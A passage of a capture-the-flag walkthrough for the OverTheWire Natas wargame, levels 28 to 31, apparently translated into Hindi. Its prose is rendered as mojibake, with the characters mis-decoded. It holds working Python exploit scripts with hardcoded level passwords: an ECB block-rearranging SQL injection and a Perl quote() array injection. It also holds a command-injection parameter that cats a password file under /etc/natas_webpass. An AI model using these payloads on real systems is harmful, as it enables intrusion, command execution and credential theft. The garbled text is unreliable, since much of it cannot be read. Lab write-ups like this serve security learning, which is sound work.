
рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо
рдирд╛рдЯреНрд╕ рд╡рд╛рд░рдЧреЗрдо рдЙрджрд╛рд╣рд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП рдХреБрдЫ
WEB- рдкрд╣рдЪрд╛рди рдХреЗ рд╕рдВрдЪрд╛рд▓рди рд╕реЗ рдирд┐рдкрдЯреЗрдВрдЧреЗред рдкреНрд░рддреНрдпреЗрдХ рд╕реНрддрд░ рдкрд░ рдЕрдЧрд▓реЗ рд╕реНрддрд░ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рддрдХ рдкрд╣реБрдВрдЪ рд╣реИред рд╕рднреА рдкрд╛рд╕рд╡рд░реНрдб / etc / natas_webpass / files рдореЗрдВ рднреА рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, natas5 рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ / etc / natas_webpass / natas5 рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИ рдФрд░ рдХреЗрд╡рд▓ natas4 рдФрд░ natas5 рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдкрдврд╝рд╛ рдЬрд╛рддрд╛ рд╣реИред
рдкрд┐рдЫрд▓реЗ рднрд╛рдЧ:
рднрд╛рдЧ 1 ,
рднрд╛рдЧ 2 ,
рднрд╛рдЧ 3 рдФрд░
рднрд╛рдЧ 4рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реАрд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЬреЛ рд╕реВрдЪрдирд╛ рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХрд┐рд╕реА рднреА рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдирдпрд╛ рд╕реАрдЦрдирд╛ рдФрд░ рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдореИрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд╢реНрд░реЗрдгрд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд▓рд┐рдЦреВрдВрдЧрд╛ рдФрд░ рдмрд╛рдд рдХрд░реВрдВрдЧрд╛:
- PWN;
- рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлреА (рдХреНрд░рд┐рдкреНрдЯреЛ);
- рдиреЗрдЯрд╡рд░реНрдХ рдЯреЗрдХреНрдиреЛрд▓реЙрдЬреАрдЬ (рдиреЗрдЯрд╡рд░реНрдХ);
- рд░рд┐рд╡рд░реНрд╕ (рд░рд┐рд╡рд░реНрд╕ рдЗрдВрдЬреАрдирд┐рдпрд░рд┐рдВрдЧ);
- рд╕реНрдЯреЗрдЧреНрдиреЛрдЧреНрд░рд╛рдлрд╝реА (рд╕реНрдЯреЗрдЧреНрдиреЛ);
- WEB рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдФрд░ рдЙрдирдХрд╛ рджреЛрд╣рдиред
рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдореИрдВ рдЕрдкрдиреЗ рдЕрдиреБрднрд╡ рдХреЛ рдХрдВрдкреНрдпреВрдЯрд░ рдлреЛрд░реЗрдВрд╕рд┐рдХ, рдореИрд▓рд╡реЗрдпрд░ рдФрд░ рдлрд░реНрдорд╡реЗрдпрд░ рдХреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг, рд╡рд╛рдпрд░рд▓реЗрд╕ рдиреЗрдЯрд╡рд░реНрдХ рдФрд░ рд╕реНрдерд╛рдиреАрдп рдХреНрд╖реЗрддреНрд░ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рд╣рдорд▓реЗ, рдкреЗрдВрдЯреЗрд╕реНрдЯ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдФрд░ рдХрд╛рд░рдирд╛рдореЗ рд▓рд┐рдЦрдиреЗ рдореЗрдВ рд╕рд╛рдЭрд╛ рдХрд░реВрдВрдЧрд╛ред
рддрд╛рдХрд┐ рдЖрдк рдирдП рд▓реЗрдЦ, рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдФрд░ рдЕрдиреНрдп рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рдмрд╛рд░реЗ
рдореЗрдВ рдЬрд╛рди рд╕рдХреЗрдВ, рдореИрдВрдиреЗ
рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдореЗрдВ рдПрдХ
рдЪреИрдирд▓ рдмрдирд╛рдпрд╛ рдФрд░ рдЖрдИрд╕реАрдбреА рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ
рдХрд┐рд╕реА рднреА рдореБрджреНрджреЗ рдкрд░ рдЪрд░реНрдЪрд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ
рд╕рдореВрд╣ рдмрдирд╛рдпрд╛ред рд╕рд╛рде рд╣реА, рдореИрдВ рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ рдЖрдкрдХреЗ рд╡реНрдпрдХреНрддрд┐рдЧрдд рдЕрдиреБрд░реЛрдзреЛрдВ, рдкреНрд░рд╢реНрдиреЛрдВ, рд╕реБрдЭрд╛рд╡реЛрдВ рдФрд░ рд╕рд┐рдлрд╛рд░рд┐рд╢реЛрдВ рдкрд░
рд╡реНрдпрдХреНрддрд┐рдЧрдд рд░реВрдк рд╕реЗ рд╡рд┐рдЪрд╛рд░
рдХрд░реВрдВрдЧрд╛ рдФрд░ рд╕рднреА рдХрд╛ рдЬрд╡рд╛рдм рджреВрдВрдЧрд╛ ред
рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА рдХреЗрд╡рд▓ рд╢реИрдХреНрд╖рд┐рдХ рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд╛рди рдХреА рдЬрд╛рддреА рд╣реИред рдЗрд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХрд╛ рд▓реЗрдЦрдХ рдЗрд╕ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдХрд╛ рдЕрдзреНрдпрдпрди рдХрд░рдиреЗ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдкреНрд░рд╛рдкреНрдд рдЬреНрдЮрд╛рди рдФрд░ рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдХрд┐рд╕реА рдХреЛ рд╣реБрдП рдиреБрдХрд╕рд╛рди рдХреЗ рд▓рд┐рдП рдХреЛрдИ рдЬрд╝рд┐рдореНрдореЗрджрд╛рд░реА рдирд╣реАрдВ рдЙрдард╛рддрд╛ рд╣реИред
рд╕реНрддрд░ 28
рдХрд┐рд╕реА рднреА рдЕрдиреБрд░реЛрдз рдХреЛ рднреЗрдЬрдиреЗ рдкрд░, рд╣рдо рдПрдХ рдЕрдиреНрдп рдкреГрд╖реНрда рдкрд░ рдПрдХ рдЕрдЬреАрдм рдЕрдиреБрд░реЛрдз рдФрд░ рдЖрдзрд╛рд░ 64 рдПрдиреНрдХреЛрдбрд┐рдВрдЧ рдХреЗ рд╕рд╛рде рд░реАрдбрд╛рдпрд░реЗрдХреНрдЯ рджреЗрдЦрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдбрд┐рдХреЛрдбрд┐рдВрдЧ рдХреБрдЫ рднреА рдирд╣реАрдВ рджреЗрддрд╛ рд╣реИред

рд╣рдо рдХреНрд╡реЗрд░реА рдХреЗ рд▓рд┐рдП рдХреЛрдИ рднреА рдЕрдиреБрд░реЛрдз рднреЗрдЬреЗрдВрдЧреЗред рд╣рдореЗрдВ рдПрдХ рддреНрд░реБрдЯрд┐ рдорд┐рд▓рддреА рд╣реИ рдЬреЛ рдпрд╣ рд╕реНрдкрд╖реНрдЯ рдХрд░рддреА рд╣реИ рдХрд┐ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рди рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЗрд╕ рдкреГрд╖реНрда рдкрд░ рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдЕрдиреБрд░реЛрдз рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣реА рд╣реИ, рд╣рдореЗрдВ рдЕрдкрдиреЗ рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдФрд░ рдЗрд╕реЗ рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рд╣рдо рдХреБрдВрдЬреА рдХреЛ рдирд╣реАрдВ рдЬрд╛рдирддреЗ рд╣реИрдВред рд▓реЗрдХрд┐рди рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рдПрдирдХреНрд░рд┐рдкреНрдЯ рд╣реИ - рдпрд╣ рд╕рд░реНрд╡рд░ рд╣реИред

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд╕рд╛рде рд╕реМрджрд╛ рдХрд░рддреЗ рд╣реИрдВред рд╣рдо рджреЛ рдЕрд▓рдЧ-рдЕрд▓рдЧ рдкрдВрдХреНрддрд┐рдпрд╛рдБ "рдХреНрд╡рд░реНрдЯреА" рдФрд░ "рдПрд╢рдлреИрдб" рднреЗрдЬреЗрдВрдЧреЗ рдФрд░ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗ рдХрд┐ рдЙрдиреНрд╣реЗрдВ рдХреИрд╕реЗ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред

рдЬрд╡рд╛рдм рдореЗрдВ, рд╣рдореЗрдВ рд╕рдорд╛рди рд░реЗрдЦрд╛рдПрдВ рдорд┐рд▓рддреА рд╣реИрдВ, рдЬреЛ рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рд╕реНрдерд╛рди рдкрд░ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЕрдиреБрдХреНрд░рдо рд╣реЛрддреА рд╣реИрдВред рдЪреВрдВрдХрд┐ рджреЛ рдкреАрд╕реА (рд╕рд┐рдлрд░ рдЯреЗрдХреНрд╕реНрдЯ) рдХреА рд╢реБрд░реБрдЖрдд рдФрд░ рдЕрдВрдд рдПрдХ рд╣реА рд╣реИ, рд╣рдо рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдирд┐рд╖реНрдХрд░реНрд╖ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ:
- рдУрдЯреА рдХреЗ рд▓рд┐рдП рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдкреВрд░рдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ (рдкреНрд▓реЗрдЯреЗрдХреНрд╕реНрдЯ);
- рдУрдЯреА рдХреЗ рд▓рд┐рдП рдПрдХ рдЕрдВрддрд┐рдо рдЕрддрд┐рд░рд┐рдХреНрдд рд╣реИ;
- рдИрд╕реАрдмреА рдореЛрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╡рд┐рднрд┐рдиреНрди рдУрдЯреА рдореЗрдВ рд╕реАрдЯреА рдХреЗ рдЕрдВрддрд┐рдо рдмреНрд▓реЙрдХ рд╕рдорд╛рди рд╣реЛрддреЗ рд╣реИрдВ, рдпрд╛рдиреА рдмреНрд▓реЙрдХ рдПрдХ рджреВрд╕рд░реЗ рд╕реЗ рд╕реНрд╡рддрдВрддреНрд░ рд╣реЛрддреЗ рд╣реИрдВред
рд╡рд┐рдЪрд╛рд░ рдпрд╣ рд╣реИ: рд╣рдо рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд▓рд┐рдП рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдПрдХ рдХреНрд╡реЗрд░реА рднреЗрдЬрддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдЗрд╕реЗ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ рдФрд░ рдЗрд╕рд▓рд┐рдП, рдЬрдм рдбрд┐рдХреНрд░рд┐рдкреНрдЯрд┐рдВрдЧ рд╣реЛрддреА рд╣реИ, рддреЛ рдЗрдВрдЬреЗрдХреНрд╢рди рдкрд╛рд╕ рдирд╣реАрдВ рд╣реЛрдЧрд╛ред рдРрдб-рдСрди рдХреЗ рд╕рд╛рде рдЙрди рдмреНрд▓реЙрдХреЛрдВ рдХреА рд╕рд╣реА рдЧрдгрдирд╛ рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ рдЬрд╣рд╛рдВ рд╣рдорд╛рд░реЗ рдкреЗрд▓реЛрдб рдХреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рдлрд┐рд░ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рдмрд╛рдж, рд╣рдо рдЕрдкрдиреЗ рдмреНрд▓реЙрдХ рдХреЛ рдЕрдиреБрд░реЛрдз рд╕реЗ рд▓реЗ рд▓реЗрдВрдЧреЗ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдХреЗрд╡рд▓ рд╕рд░реНрд╡рд░ рдкрд░ рднреЗрдЬ рджреЗрдВрдЧреЗред рд╕рд░реНрд╡рд░ рдкрд░ рдЙрдиреНрд╣реЗрдВ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ рдФрд░, рдЪреВрдВрдХрд┐ рд╡реЗ рдРрдб-рдСрди рдХреЗ рдмрд┐рдирд╛ рд╣реИрдВ, рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддреЗ рд╣реИрдВред
рд╡рд┐рдЪрд╛рд░ рдЪрд╛рд░ рдЫрд╡рд┐рдпреЛрдВ рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ:
- 5 рдмреНрд▓реЙрдХ рдХреА рдкреНрд░рд╕реНрддреБрддрд┐
- рдкреНрд░рд╛рд░рдВрдн рдФрд░ рдЕрдВрдд рдкрд░рд┐рд╡рд░реНрдзрди рдХреЗ рд╕рд╛рде рдПрдХ рдПрдирдХреЛрдбрд░ рдЬреЛ рдПрдХ рд░рд┐рдХреНрдд рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░рддрд╛ рд╣реИред
- рд╕реНрдЯреНрд░рд┐рдВрдЧ рдХрд╛ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди "TEXTTEXTTEXTTEXT"ред
- рдЕрдкрдиреА рд▓рд╛рдЗрди рдХреЛ рдЕрд▓рдЧ рдмреНрд▓реЙрдХ рдореЗрдВ рд░рдЦрдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдФрд░ рдмрд╛рдж рдореЗрдВ рдЖрд╡рд╢реНрдпрдХ рд╕рдВрдЦреНрдпрд╛рдУрдВ рдХреЛ рдЬреЛрдбрд╝рдХрд░ рд╣рдо рдкрд░рд┐рд╡рд░реНрдзрди рд╕реЗ рдЫреБрдЯрдХрд╛рд░рд╛ рдкрд╛ рд▓реЗрддреЗ рд╣реИрдВред рд╣рдо рдкреАрд╕реА рд╕реЗ рдХреЗрд╡рд▓ рджреВрд╕рд░реЗ рдмреНрд▓реЙрдХ рд▓реЗрддреЗ рд╣реИрдВред

рдЗрд╕ рддрд░рд╣, рд╣рдореЗрдВ рдХреЗрд╡рд▓ рдПрдХ рдЕрдЬреНрдЮрд╛рдд рдХреБрдВрдЬреА рдкрд░ рд╣рдорд╛рд░реА рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рд╕реНрдЯреНрд░рд┐рдВрдЧ рдкреНрд░рд╛рдкреНрдд рд╣реБрдИ !!!
рдбреЗрдЯрд╛ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛:
- рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдореЛрдб (рдЬреНрдЮрд╛рдд - рдИрд╕реАрдмреА)
- рдмреНрд▓реЙрдХ рд▓рдВрдмрд╛рдИ (рдЬреНрдЮрд╛рдд - 16)
- рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдРрдб-рдСрди рд▓рдВрдмрд╛рдИ (рдЕрдЬреНрдЮрд╛рдд)
- рд╣рдорд╛рд░реЗ рдкрд╛рда рдХреА рд▓рдВрдмрд╛рдИ (рдЬреНрдЮрд╛рдд - "рдкрд╛рд╕рд╡рд░реНрдб рдЪреБрдиреЗрдВ"
рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рд╕реЗ рдордЬрд╛рдХ рдХреЗ рд░реВрдк рдореЗрдВ ")
рдкреНрд░рд╛рд░рдВрднрд┐рдХ рднрд░рдиреЗ рдХреА рд▓рдВрдмрд╛рдИ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИред рдЪреВрдВрдХрд┐ рдкрд╣рд▓реЗ рджреЛ рдмреНрд▓реЙрдХ рд╕рдорд╛рди рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рд╣рдо рдЕрд▓рдЧ-рдЕрд▓рдЧ рд╕рдВрдЦреНрдпрд╛ рдореЗрдВ рд╡рд░реНрдг рднреЗрдЬреЗрдВрдЧреЗ, рдФрд░ рдЬреИрд╕реЗ рд╣реА рддреАрд╕рд░рд╛ рдмреНрд▓реЙрдХ рдмрджрд▓рдирд╛ рдмрдВрдж рд╣реЛрдЧрд╛, рд╣рдо рдЗрд╕реЗ рдкреВрд░рдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рд╡рд░реНрдгреЛрдВ рдХреА рд╕рдВрдЦреНрдпрд╛ рдкрд╛рдПрдВрдЧреЗред рдпреЗ 10 рдЕрдХреНрд╖рд░ рд╣реИрдВред рдиреАрдЪреЗ рдЙрдкрд░реЛрдХреНрдд рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рдХрд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реИред
import base64 import requests from urlparse import urlsplit from urllib2 import unquote def ChiperQuery(url, auth, query): resp = requests.post(url, auth=auth, data={'query': query}) query_param = unquote(urlsplit(resp.url)[3][6:]) byte_decode_query = bytearray(base64.b64decode(query_param)) return byte_decode_query def SendPayload(url, auth, payload): enc_payload = base64.b64encode(bytes(payload)) ret = requests.get(url + '/search.php', auth=auth, params={'query': enc_payload}) return ret.text url = "http://natas28.natas.labs.overthewire.org/" auth = requests.auth.HTTPBasicAuth("natas28", "JWwR438wkgTsNKBbcJoowyysdM82YjeF") query = "SELECT password AS joke FROM users" query += " " * (16-len(query)%16) plaintext = 'b'*10 + query + chr(16)*16 chip_query = ChiperQuery(url, auth, plaintext) st_pos = len(query) count = st_pos+16 result = SendPayload(url, auth, chip_query[st_pos:st_pos+count]) print(result)

рд╣рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рдорд┐рд▓рддрд╛ рд╣реИред
рд╕реНрддрд░ 29
рдпрд╣ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛рдирд╛ рдореБрд╢реНрдХрд┐рд▓ рд╣реИ рдХрд┐ рдкрд░реНрд▓ рдХреЛрдб рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдлрд╝рдВрдХреНрд╢рди рдХреЛ рдХреЙрд▓ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдХрдорд╛рдВрдб рдХреЛ рдбреЗрдЯрд╛ рдлрд╝рд╛рдЗрд▓ (рдЬрд┐рд╕реЗ рдЖрдк рдЪреБрди рд╕рдХрддреЗ рд╣реИрдВ) рдореЗрдВ рдХрдорд╛рдВрдб рдХреЛ рдкрд╛рд╕ рдХрд░рддрд╛ рд╣реИред рддрдереНрдп рдпрд╣ рд╣реИ рдХрд┐ рд╣рдо рдкрд╛рдЗрдкрд▓рд╛рдЗрди рдХреЛ "рдирд┐рд╖реНрдкрд╛рджрди" рд╕реЗ рдмрдВрдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ read_command_file "рдореЗрдВ" рдирд┐рд╖реНрдкрд╛рджрди | read_command | our_smd_commandред "

рд▓реЗрдХрд┐рди рддрдереНрдп рдпрд╣ рд╣реИ рдХрд┐ рд╣рдорд╛рд░реА рдЯреАрдо рдХрдВрд╕реЛрд▓ рдкрд░ рдкреНрд░рджрд░реНрд╢рд┐рдд рд╣реЛрдЧреА, рди рдХрд┐ рд╕рд╛рдЗрдЯ рдкрд░ред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЗрдирдкреБрдЯ / рдЖрдЙрдЯрдкреБрдЯ рд╕реНрдЯреНрд░реАрдо рдореЗрдВ рд╡рд░реНрдгреЛрдВ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЬреЛрдбрд╝реЗрдВ: тАЬ| tr `рд╕реЗ рдкрд╣рд▓реЗ` рдХреЗ рдмрд╛рдж`ред

рдЪреВрдВрдХрд┐ рдХрдорд╛рдВрдб рдкреВрд░рд╛ рд╣реЛ рдЧрдпрд╛ рд╣реИ, рд╣рдо рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдлрд╝рд╛рдЗрд▓ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдкрдврд╝реЗрдВрдЧреЗред рд▓реЗрдХрд┐рди рд╣рдореЗрдВ рдмрддрд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рд╣рдо рдРрд╕рд╛ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ ...

рд╣рдо рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдлрд╝рд┐рд▓реНрдЯрд░рд┐рдВрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗ рдФрд░ рдХрд┐рд╕реА рднреА рд╕реНрдерд╛рди рдкрд░ рдЙрджреНрдзрд░рдг рдЪрд┐рд╣реНрдиреЛрдВ рдХреЛ рд╕рдореНрдорд┐рд▓рд┐рдд рдХрд░реЗрдВрдЧреЗ рдЬреЛ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрдиреЗ рдкрд░ рдорд┐рдЯ рдЬрд╛рдПрдВрдЧреЗред

рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓ рд▓реЗрддреЗ рд╣реИрдВред
рд╕реНрддрд░ 30
рд╕реНрд░реЛрдд рдХреЛрдб рджреЗрдЦреЗрдВред рдпрд╣рд╛рдВ рдЙрджреНрдзрд░рдг () рдкрджреНрдзрддрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рдПрдХ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдореЗрдВ рд╕рднреА рд╡рд┐рд╢реЗрд╖ рд╡рд░реНрдгреЛрдВ рд╕реЗ рдмрдЪ рдЬрд╛рддрд╛ рд╣реИред рд▓реЗрдХрд┐рди рдпрд╣ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдореЗрдВ рдмрдЪ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рд╣рдореЗрдВ рдЗрдВрдЬреЗрдХреНрд╢рди рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ рджреЗрддрд╛ рд╣реИ, рдпрджрд┐ рд╣рдо рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдПрдХ рд╕рд░рдгреА (рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рдПрдХ рд╢реВрдиреНрдп рддрддреНрд╡ рд╕реНрд╡реАрдХрд╛рд░ рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛)ред

рдЪрд▓реЛ рдЕрдиреБрд░реЛрдз рдХреЗ рд▓рд┐рдП рдПрдХ рд▓реЛрдб рдХреЗ рд╕рд╛рде рдЖрддреЗ рд╣реИрдВ
Select * FROM users where username = 'username' and password = 'password';
рдЪреВрдВрдХрд┐ рд╣рдо рдЬрд╛рдирддреЗ рд╣реИрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо natas31 рд╣реИ, рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдореЗрдВ рд╕рд╣реА рд╕реНрдерд┐рддрд┐ рдХрд╛ рдкрд░рд┐рдЪрдп рджреЗрддреЗ рд╣реИрдВ: '' рдпрд╛ 1. рддрдм рд╣рдорд╛рд░рд╛ рдЕрдиреБрд░реЛрдз рдЗрд╕ рддрд░рд╣ рд╣реЛ рдЬрд╛рдПрдЧрд╛
Select * FROM users where username = 'natas31' and password = '' or 1;
рдФрд░ рдЕрдм рдпрд╣ рдПрдХ рд╕рд░рдгреА рднреЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдмрдиреА рд╣реБрдИ рд╣реИред
import requests url = "http://natas30.natas.labs.overthewire.org/index.pl" s = requests.Session() s.auth = ('natas30', 'wie9iexae0Daihohv8vuu3cei9wahf0e') args = { "username": "natas31", "password": ["'' or 1", 2] } r = s.post(url, data=args) print(r.text)

рд╣рдо рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓ рд▓реЗрддреЗ рд╣реИрдВред
рд╕реНрддрд░ 31
рд╕реЗрд╡рд╛ рдХрд╛ рд╕рд╛рд░ рддреБрд░рдВрдд рд╕реНрдкрд╖реНрдЯ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ: рд╕реАрдПрд╕рд╡реА рдлрд╝рд╛рдЗрд▓ рд╕реЗ рд╣рдореЗрдВ HTML рдореЗрдВ рддрд╛рд▓рд┐рдХрд╛ рдорд┐рд▓рддреА рд╣реИред

рд╕реНрд░реЛрдд рдХреЛрдб рджреЗрдЦрддреЗ рд╣реИрдВред

рдФрд░ рдЗрд╕рд▓рд┐рдП, рдХреНрдпрд╛ рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ: рдпрд╣ рд╕рдордп рд░реЗрдЦрд╛ (<$ рдлрд╝рд╛рдЗрд▓>) рд╣реИ, рдЬрдмрдХрд┐ рдлрд╝рд╛рдЗрд▓ рдкреИрд░рд╛рдореАрдЯрд░ рд╕реЗ рд░реЗрдЦрд╛ рд╣реИред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред

рдХрд┐рд╕реА рднреА рд╕реАрдПрд╕рд╡реА рдлрд╝рд╛рдЗрд▓ рдХреЛ рднреЗрдЬреЗрдВ рдФрд░ рдмрд░реНрдк рд╕реВрдЯ рдореЗрдВ рдЕрдиреБрд░реЛрдз рдХреЛ рд░реЛрдХреЗрдВред

рдЕрдм рдХрдорд╛рдВрдб рдХреЛ рдПрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВред
?/bin/cat%20/etc/natas_webpass/natas32%20|

рдкреИрд░рд╛рдореАрдЯрд░ рд╕реЗ рд▓реЛрдб рдХреЛ рдХреЙрд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рд▓рд╛рдЗрдиреЗрдВ рдЬреЛрдбрд╝реЗрдВ:
